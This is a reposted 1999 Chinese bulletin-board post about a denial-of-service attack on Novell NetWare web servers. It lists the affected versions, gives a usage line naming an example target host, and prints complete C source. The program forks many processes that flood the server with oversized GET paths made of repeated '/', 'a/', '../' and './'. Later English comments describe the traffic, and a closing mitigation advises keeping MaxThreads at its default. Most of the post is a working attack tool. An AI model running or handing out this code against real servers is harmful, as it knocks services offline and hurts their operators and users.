
主题:对Novell的过载攻击,转
发信人: coolinger()
整理人: williamlong(1999-11-02 19:29:25), 站内信件
对Novell的过载攻击,适用于以下配置:
Novell NetWare 4.11 & Novell-HTTP-Server/3.1R1 --- 结果是 web server 死掉
Novell NetWare 4.1 & Novell-HTTP-Server/2.51R1 --- 整个系统将当掉
安装了 YAWN/1.05 (crc:E8B0) 的 Novell --- web server 死掉 (除3.12和4.11外)
 
 
用法:www <vulnerable_host> <http_port> <how_many_connections> <string_length>
如: www copernicus.9lo.lublin.pl 80 10 10000

Code:

在Linux下编译这段代码,生成执行文件www:

   #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <sys/wait.h>

    /*
     * Building blocks of the request strings assembled in main(): the request
     * method, followed by the four path fragments that are each repeated many
     * times to form one oversized request path per fragment.
     */
    #define GET "GET"
    #define PAT1 "/"
    #define PAT2 "a/"
    #define PAT3 "../"
    #define PAT4 "./"

    /*
     * Resolve `name` to an IPv4 address value suitable for sin_addr.s_addr.
     *
     * The string is first handed to inet_addr(); only when that result compares
     * equal to -1 is a gethostbyname() lookup attempted. If the lookup fails the
     * function reports it with perror() and terminates the whole process with
     * exit status 1, so it never returns an error to the caller.
     */
    long getip(char *name)
    {
      struct hostent *hp;
      long ip;

      /* Numeric address form first; -1 is treated as "not a numeric address". */
      if ((ip=inet_addr(name))==-1)
      {
        if ((hp=gethostbyname(name))==NULL)
        {
          perror("gethostbyname");
          exit(1);
        }
        /* Copy the first 4 bytes of the first returned address into ip. */
        memcpy(&ip, (hp->h_addr), 4);
      }
      return ip;
    }

    /*
     * Entry point. Arguments: argv[1] host, argv[2] TCP port, argv[3] number of
     * child processes to fork, argv[4] length value that sizes the request path.
     *
     * What the code puts on the wire (useful when writing a detection or reading
     * server logs): every child opens four TCP connections one after another and
     * writes a single string on each. Each string is "GET /" followed by one of
     * the fragments "/", "a/", "../" or "./" repeated len/sizeof(fragment) times.
     * No HTTP version and no line terminator are appended, and the socket is
     * closed immediately after the write without reading a reply.
     * NOTE(review): the post attributes the server failure to the number of
     * parallel connections (MaxThreads); the code itself only shows the traffic
     * shape described above.
     */
    int main (argc, argv)
    int argc;
    char **argv;
    {
      struct sockaddr_in cli;
      int sockfd, i, x, len;
      char *msg1, *msg2, *msg3, *msg4;

      /* Fewer than four arguments: print usage and exit with status 0. */
      if (argc < 5) { (void)fprintf(stderr, "usage: %s <host> <port> <
connections> <len>\n", argv[0]); exit(0); }

      /* Destination address shared by every connection made below. */
      bzero(&cli, sizeof(cli));
      cli.sin_family = AF_INET;
      cli.sin_addr.s_addr=getip(argv[1]);
      cli.sin_port = htons(atoi(argv[2]));

      /* atoi() gives no error indication; only a lower bound is enforced. */
      len = atoi(argv[4]);
      if (len < (sizeof(GET)+1+sizeof(PAT1))) { (void)fprintf(stderr,
"len too small.\n"); exit(1); }
/* Four buffers of len bytes plus room for the "GET /" prefix and terminator.
 * The malloc() results are used without a NULL check. */
msg1 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg2 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg3 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg4 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);

/* All four strings start with the same prefix: PAT1 is used for each. */
sprintf(msg1, "%s %s", GET, PAT1);
sprintf(msg2, "%s %s", GET, PAT1);
sprintf(msg3, "%s %s", GET, PAT1);
sprintf(msg4, "%s %s", GET, PAT1);

/* Append the fragment len/sizeof(PATn) times. sizeof counts the terminating
 * NUL, so the appended text is always shorter than len bytes. */
for(i=0;i<(len/sizeof(PAT1));i++) strcat(msg1, PAT1);
for(i=0;i<(len/sizeof(PAT2));i++) strcat(msg2, PAT2);
for(i=0;i<(len/sizeof(PAT3));i++) strcat(msg3, PAT3);
for(i=0;i<(len/sizeof(PAT4));i++) strcat(msg4, PAT4);

/* Fork argv[3] children. The braces below are the child branch (fork()
 * returned 0); the parent just continues the loop, and x ends up holding the
 * return value of the last fork() call. */
for(i=0;i<(atoi(argv[3]));i++) if (!(x=fork()))
{
/* Connection 1: send msg1 (repeated "/"), then close. */
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
/* The write() result is ignored; a short or failed write goes unnoticed. */
write(sockfd, msg1, strlen(msg1));
close(sockfd);

/* Connection 2: send msg2 (repeated "a/"), then close. */
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg2, strlen(msg2));
close(sockfd);

/* Connection 3: send msg3 (repeated "../"), then close. */
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg3, strlen(msg3));
close(sockfd);

/* Connection 4: send msg4 (repeated "./"), then close. */
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg4, strlen(msg4));
close(sockfd);

/* Child is done after its four connections. */
exit(0);
}

/* Parent: waits for the pid stored in x only; the exit status is written into i. */
waitpid(x,&i,0);

exit(0);
}

解决方案:这是一种过载(拒绝服务)攻击,问题出在 web server 允许的并行连接数配置上:

httpd.cfg 中的 MaxThreads 参数设置过高。缺省设置为16,比较安全;设得越高越危险,因此应保持缺省值,不要随意调高。


 

--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.102.89.124]
